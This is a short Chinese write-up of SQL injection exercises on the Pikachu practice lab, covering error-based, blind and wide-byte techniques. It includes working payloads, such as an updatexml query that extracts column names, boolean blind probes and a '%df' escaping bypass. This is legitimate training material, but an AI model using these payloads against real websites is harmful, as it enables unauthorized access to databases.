pikachu的sql注入

数字型注入(post)

 burp抓包

pikachu的sql注入

 成功

pikachu的sql注入

字符型注入(get)

 直接注入

 成功注入。

 pikachu的sql注入

搜索型注入

pikachu的sql注入

 使用同样的方法也能同样注入成功

xx型注入

需要闭合

 加)之后注入成功。

pikachu的sql注入

insert/updata 注入

a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘

burp抓包修改

pikachu的sql注入

注入成功。

delete 注入

pikachu的sql注入

 注入成功

http header注入

pikachu的sql注入

 注入成功

盲注 base on boolian

pikachu的sql注入

kobe‘ and length(database())>5#
。。。
kobe‘ and length(database())=7#
kobe‘ and ascii(substr(database(), 1, 1)) > 105#慢慢盲注,只能挨个试。。

盲注(based on time)

 同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。

pikachu的sql注入

宽字节注入

 刚开始尝试发现注入不行,抓包发现以及进行了编码

 在抓包后修改也不行  

 发现‘被后台转移,所以构造payload kobe%df or 1=1#

pikachu的sql注入

 pikachu的sql注入

 注入成功

相关推荐